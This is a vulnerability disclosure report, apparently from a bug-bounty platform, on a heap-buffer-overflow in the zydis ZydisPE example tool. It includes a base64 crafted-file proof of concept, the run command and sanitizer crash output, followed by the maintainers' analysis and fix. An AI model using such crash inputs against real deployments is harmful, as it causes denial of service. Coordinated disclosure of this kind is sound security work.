Heap-based Buffer Overflow in zyantific/zydis

Valid

Reported on

Oct 21st 2021


Description

Hello, we hope you're doing well during these challenging times. Whilst testing zydis built from commit 077b185 with Clang12 + ASan on Ubuntu 18.04, we discovered a crafted PE file that when fed to ZydisPE triggers a heap-buffer-overflow, READ of size 1.

Proof of Concept

POC Base64

TVpxRnBEPScKAAAQAPgAAAAAAAAAAQAIQAAAAAAAAAAAAAAASlQAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA+AoAALJA6wDrFJCQ6wZIg+wIMdK9AADrBemmEAAA/A8fhz7gvwBwMcmOwfqO14nM+w4f6AAA
XoHucgC4AAJQUAcx/7kAAvOkDx+H0v/qjiAAAI7ZuQAbuFAAjsAxwDH/86qA+kB0E+gVAAewATHJ
MPa/GADoSABPdfrqGCUAAFNStAjNE3IsiM+A5z+A4cDQwdDBhs0eBh8x9o7GvhAVh/elpaWlpaQf
k6uRq5KrWKqSW8NagPKAMcDNE3L368FQUYbN0MnQyQjBMduwAbQCzRNZWHIdjMaDxiCOxv7AOgYc
FXYNsAH+xjo2IBV2AzD2QcNQMcDNE1jrxYn+rITAdAm7BwC0Ds0Q6/LDV792JOjo/1/o5P+/fiTo
3v/zkOv8uQQAvgAErYXAdAtRVpe+nCToBQBeWeLuw4n6hdJ0FFJWMcmxAwHKrF4MgO5arO5CSXn6
wwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVaon
CiMnIgpvPSIkKGNvbW1hbmQgLXYgIiQwIikiCmlmIFsgLWQgL0FwcGxpY2F0aW9ucyBdOyB0aGVu
CmRkIGlmPSIkbyIgb2Y9IiRvIiBicz04IHNraXA9IiAgICAgMzk0IiBjb3VudD0iICAgICAgODci
IGNvbnY9bm90cnVuYyAyPi9kZXYvbnVsbAplbGlmIGV4ZWMgNzw+ICIkbyI7IHRoZW4KcHJpbnRm
ICdcMTc3RUxGXDJcMVwxXDAxMVwwXDBcMFwwXDBcMFwwXDBcMlwwXDA3NlwwXDFcMFwwXDBcMDAw
XDAyMVwxMDBcMDAwXDAwMFwwMDBcMDAwXDAwMFwzNTBcMDExXDAwMFwwMDBcMDAwXDAwMFwwMDBc
MDAwXDAwMFwwMDBcMDAwXDAwMFwwMDBcMDAwXDAwMFwwMDBcMFwwXDBcMFwxMDBcMFwwNzBcMFww
MDRcMDAwXDBcMFwwMDBcMDAwXDAwMFwwMDAnID4mNwpleGVjIDc8Ji0KZWxzZQpleGl0IDEKZmkK
ZXhlYyAiJDAiICIkQCIKUj0kPwoKaWYgWyAkUiAtZXEgMTI2IF0gJiYgWyAiJCh1bmFtZSAtbSki
ICE9IHg4Nl82NCBdOyB0aGVuCmlmIFE9IiQoY29tbWFuZCAtdiBxZW11LXg4Nl82NCkiOyB0aGVu
CmV4ZWMgIiRRIiAiJDAiICIkQCIKZWxzZQplY2hvIGVycm9yOiBuZWVkIHFlbXUteDg2XzY0ID4m
MgpmaQplbGlmIFsgJFIgLWVxIDEyNyBdOyB0aGVuCiAgZXhlYyAiJG8iICIkQCIKZmkKZXhpdCAk
UgplcnJvcjogAA0KAGNwdWlkAG9sZHNrb29sAGU4MjAAbm9sb25nAAwAAEM4AKwkAAAAAAAAAAAA
AAAAAAAAAP//AAAAmg8A//8AAACSDwD//wAAAJrPAP//AAAAks8A//8AAACbrwD//wAAAJOvAAKw
rRsAAAEA/k9R5OQEAAAAABAAADAQAAAAEQAEBQAAagCdskAPIMCD4P4PIsBm6logAADo4wvoPvzo
2gvoAADoDADotgDoaQDoHQHoegGcWPbEgHVMZpxmWGaJwWa7AAAgAGYx2GZQZp1mnGZYZjnBdDlm
CdhmUGadZr8AAACAZon4ZkcPomY5+HwbZon4D6JmvwAAACBmIfpmOfp1CDHAw7+HJOsIv5Uk6wO/
gSTosfu/UQCOx2Yx/2Yx22a4IOgAAGa5GAAAAGa6UEFNU80VciNmOdB1HoXJdA6D+RVyBvZFFAF1
A4PHGGaF23QGgf8AEHLIw7+QJOhn+/oeMcCOwEiO2L8ABb4QBSaKBVCKBFAmxgUAxgT/JoA9/1iI
BFgmiAUfdUC4AQDoLACwreZk6CUAsNDmZOglAORgUOgYALDR5mToEQBYDALmYOgJALCu5mToAgDr
o+RkqAJ1+sPkZKgBdPrD+8MeuAB5jthmxwYAUAPQBwBmxwYAWAPABwBmxwYAQAOwBwBmxwYAMAOg
BwBmxwYAIAOQBwBmxwYAEAOQBwC5AAJmuAMAAAAx9maJBGYFABAAAIPGCOLyZrgA4AcADyLYH8P6
DwEeIhUPIOBmDaACAAAPIuBmuYAAAMAPMmYNAQEAAA8wDwEWoCQPIMBmDQMAAIBmg+D7DyLA6ukm
KABqMFiO2I7QjsCO4I7ovAAACABFMeRFMe1FMfZFMf8x2zHtVUjHxwAFAAAPIN66ACAAAOjgCAAA
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
SIPsIEiLHU0HAABMiy0uBwAAavZZQf/VRInySInB/9Nq9VlB/9W6BwAAAEiJwf/TSIPEIESJ5+hd
AAAASIn8SInwSInXSInOTInCTInJSDHt/9APC4n/McCD/392IA+9z4sMTZoaQACJ+sHvBoDiPwyA
CNBIweAI/sl17AjoSAn4w41H94P4BA+WwIP/IA+UwgnQD7bAw5CQVYsV4BYAAEiJ5fbCBnQY9sIC
dB6LBWUWAADB6AgzBVgWAAA8NHULSIsF2RYAAA8F6xeA4gR0EkiD7CBAD7bP/xU6BgAASIPEIGoA
agD6DwEcJA8L6/wl/w8AAD3/DwAAdB9JicpVSInlDwVdSD0B8P//cwHD99iJBaYiAABq/1jDiwV4
FgAA6+5Iweg06w1Iwego6wdIwegcD7fAJf8PAABmPf8PdNpJicoPBXLJw0GJw0GB4wAAAA/B4AjB
6BRECdjr3ZBmkGFwZS5jb20ATUVUQUw9MQB4AHQAZQByAG0ALQB0AHIAdQBlAGMAbwBsAG8AcgAA
AFQARQBSAE0AAABmDx9EAAAYAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABwAHAAcABwALgAuAC4ALg
AuAD8APwA/AD8APwBPgE+AT4BPgE+AX8BfwF/AX8BfwF/AAAa2VybmVsMzIuZGxsAApDb3Ntb3Bv
bGl0YW4KQ29weXJpZ2h0IDIwMjAgSnVzdGluZSBBbGV4YW5kcmEgUm9iZXJ0cyBUdW5uZXkKClBl
cm1pc3Npb24gdG8gdXNlLCBjb3B5LCBtb2RpZnksIGFuZC9vciBkaXN0cmlidXRlIHRoaXMgc29m
dHdhcmUgZm9yCmFueSBwdXJwb3NlIHdpdGggb3Igd2l0aG91dCBmZWUgaXMgaGVyZWJ5IGdyYW50
ZWQsIHByb3ZpZGVkIHRoYXQgdGhlCmFib3ZlIGNvcHlyaWdodCBub3RpY2UgYW5kIHRoaXMgcGVy
bWlzc2lvbiBub3RpY2UgYXBwZWFyIGluIGFsbCBjb3BpZXMuCgpUSEUgU09GVFdBUkUgSVMgUFJP
VklERUQgIkFTIElTIiBBTkQgVEhFIEFVVEhPUiBESVNDTEFJTVMgQUxMCldBUlJBTlRJRVMgV0lU
SCBSRUdBUkQgVE8gVEhJUyBTT0ZUV0FSRSBJTkNMVURJTkcgQUxMIElNUExJRUQKV0FSUkFOVElF
UyBPRiBNRVJDSEFOVEFCSUxJVFkgQU5EIEZJVE5FU1MuIElOIE5PIEVWRU5UIFNIQUxMIFRIRQpB
VVRIT1IgQkUgTElBQkxFIEZPUiBBTlkgU1BFQ0lBTCwgRElSRUNULCBJTkRJUkVDVCwgT1IgQ09O
U0VRVUVOVElBTApEQU1BR0VTIE9SIEFOWSBEQU1BR0VTIFdIQVRTT0VWRVIgUkVTVUxUSU5HIEZS
T00gTE9TUyBPRiBVU0UsIERBVEEgT1IKUFJPRklUUywgV0hFVEhFUiBJTiBBTiBBQ1RJT04gT0Yg
Q09OVFJBQ1QsIE5FR0xJR0VOQ0UgT1IgT1RIRVIKVE9SVElPVVMgQUNUSU9OLCBBUklTSU5HIE9V
VCBPRiBPUiBJTiBDT05ORUNUSU9OIFdJVEggVEhFIFVTRSBPUgpQRVJGT1JNQU5DRSBPRiBUSElT
IFNPRlRXQVJFLgoAAGFXAAAAAEV4aXRQcm9jZXNzAAAARnJlZUVudmlyb25tZW50U3RyaW5nc1cA
AABHZXRDb21tYW5kTGluZVcAAABHZXRDb25zb2xlTW9kZQAAAABHZXRFbnZpcm9ubWVudFN0cmlu
Z3NXAAAAAEdldFN0ZEhhbmRsZQAAAABNYXBWaWV3T2ZGaWxlRXhOdW1hAAAAU2V0Q29uc29sZUNQ
AAAAAFNldENvbnNvbGVNb2RlAAAAAFNldENvbnNvbGVPdXRwdXRDUAAAAABTZXRFbnZpcm9ubWVu
dFZhcmlhYmxlVwAIHwAAAAAAAAAAAADcGgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6B0AAAAA
AAACHgAAAAAAABAeAAAAAAAAKh4AAAAAAAA8HgAAAAAAAE4eAAAAAAAAaB4AAAAAAAB4HgAAAAAA
AI4eAAAAAAAAnh4AAAAAAACwHgAAAAAAAMYeAAAAAAAAAAAAAAAAAACQTgEm5wFOAU4BAf8fToGA
gBBmLg8fhAAAAAAAZi4PH4QAAAAAAGYuDx+EAAAAAABmLg8fhAAAAAAAZi4PH4QAAAAAAGYuDx+E
AAAAAABmLg8fhAAAAAAAZi4PH4QAAAAAAGYuDx+EAAAAAABmLg8fhAAAAAAAZi4PH4QAAAAAAGYu
Dx+EAAAAAABmDx9EAAA=

echo base64 > /tmp/test.fuzz

./ZydisPE /tmp/test.fuzz

0000000000401FD5  66 2E 0F 1F 84 00 00 00 00 00                 nop word ptr ds:[rax+rax*1], ax
0000000000401FDF  66 0F 1F 44 00 00                             nop word ptr ds:[rax+rax*1], ax
=================================================================
==1628750==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000020e5 at pc 0x0000003b8be6 bp 0x7ffc172c1050 sp 0x7ffc172c1048
READ of size 1 at 0x6250000020e5 thread T0
    #0 0x3b8be5 in ZydisInputPeek /root/zydis/src/Decoder.c:310:18
    #1 0x3b8be5 in ZydisCollectOptionalPrefixes /root/zydis/src/Decoder.c:3284:9
    #2 0x3b8be5 in ZydisDecoderDecodeBuffer /root/zydis/src/Decoder.c:5074:5
    #3 0x3ab695 in DisassembleMappedPEFile /root/zydis/tools/ZydisPE.c:1021:26
    #4 0x3ab695 in main /root/zydis/tools/ZydisPE.c:1174:10
    #5 0x7fa6cc63a564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #6 0x2f4e3d in _start (/root/zydis/build/ZydisPE+0x2f4e3d)

0x6250000020e5 is located 0 bytes to the right of 8165-byte region [0x625000000100,0x6250000020e5)
allocated by thread T0 here:
    #0 0x37009d in malloc (/root/zydis/build/ZydisPE+0x37009d)
    #1 0x3a4fae in main /root/zydis/tools/ZydisPE.c:1113:20
    #2 0x7fa6cc63a564 in __libc_start_main csu/../csu/libc-start.c:332:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/zydis/src/Decoder.c:310:18 in ZydisInputPeek

Impact

Application crash, local denial of service

Please note that I am available for contract jobs, I can help you to improve your fuzzer code coverage, or just help you privately squash bugs. We have been successfully fuzzing Open Source Software for over a decade. Thank you.

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
Geeknik Labs modified their report
a month ago
Geeknik Labs modified their report
a month ago
Geeknik Labs modified their report
a month ago
Geeknik Labs modified their report
a month ago
We have opened a pull request with a SECURITY.md for zyantific/zydis to merge. a month ago
We have contacted a member of the zyantific/zydis team and are waiting to hear back a month ago
Joel Höner validated this vulnerability a month ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joel Höner
a month ago

Hi there and thanks for the report!

The ZydisPE tool is something that we wrote quite a while back as an example on how to use our formatter API for using custom symbols in disassembly output. Being meant as an example, it wasn’t hardened against crafted inputs in any form, as the comment here hints towards. Having it live in the tools directory was a mistake, because it suggests that it is something that we actually expect users to use. It should rather have lived in the examples folder, and should clarify more clearly that the PE parsing doesn’t perform any meaningful input validation.

Because we’re quite aware of the limitations in the implementation, the tool doesn’t have an install rule defined for it, meaning that it isn’t installed when you invoke make install, nor is it shipped in any of the repositories that have packages for Zydis. The practical impact of this vuln should thus be relatively low.

For the time being, we just completely deleted the ZydisPE tool. Because none of the packaged versions of Zydis include this tool and shipping updated packages is thus not required for a fix, we’d be fine with disclosing this publicly immediately. We didn’t obfuscate the commit message, so the issues is now essentially public already:

https://github.com/zyantific/zydis/pull/257

In any case, this report served as a valuable reminder that we don’t have fuzzing coverage even for the tools that we install and do intend users to use (ZydisInfo, ZydisDisasm) and that we should change that ASAP. Unfortunately, OSS-Fuzz doesn’t appear to have a mechanism to apply weights to fuzzing targets, so adding these two targets will take away 66% of CPU from ZydisFuzzIn, which we consider to be the most important target that should receive the majority of compute to find bugs all across the library rather than just the helper tools. Perhaps we should just have a field in the control block in ZydisFuzzIn that, when the fuzzer flips it on, invokes the main function of the respective tool (essentially just #include<> the other tools into ZydisFuzzIn), but it sounds like a bit of PITA to get it right w.r.t the command line arguments being passed like the fuzzer would otherwise do it on its own etc. Anyways, we’ll find a way (or just accept the 66% perf hit).

Geeknik Labs
a month ago

Researcher


Message received and understood, however, I believe some of the issues we reported reside OUTSIDE of the ZydisPE tool, for example:

heap-buffer-overflow in ZydisInputNextBytes /root/zydis/src/Decoder.c:403:9 heap-buffer-overflow in ZydisInputNext /root/zydis/src/Decoder.c:364:33

We attached Base64 encoded POCs for those as well, however you do have to use the ZydisPE tool to reach those points in the Zydis code as we didn't write any other kind of harness to test.

Joel Höner
a month ago

Given that Zydis' decoder and formatter don't actually allocate any heap memory at all, this is most likely a result of bad values being passed to the decoder (too large size and too small buffer) due to previous lack of validation in ZydisPE. However, let me verify this to make absolutely sure this is the case before we publish this.

Geeknik Labs
a month ago

Researcher


No worries, I just wanted to make sure all the bases were covered. Thank you.

Joel Höner
a month ago

I manually checked in LLDB and can confirm that it is indeed just ZydisPE passing invalid arguments. For example, it's passing 0x00006250000020f0 as the input buffer and length = 16, and then a 4 byte read at 0x6250000020f9 triggers ASAN, which proves that the provided buffer was invalid to begin with. The situation is the same (with different buffer sizes) in the other example.

Geeknik Labs
a month ago

Researcher


Thank you for the clarification.

Joel Höner confirmed that a fix has been merged on 869dfb a month ago
The fix bounty has been dropped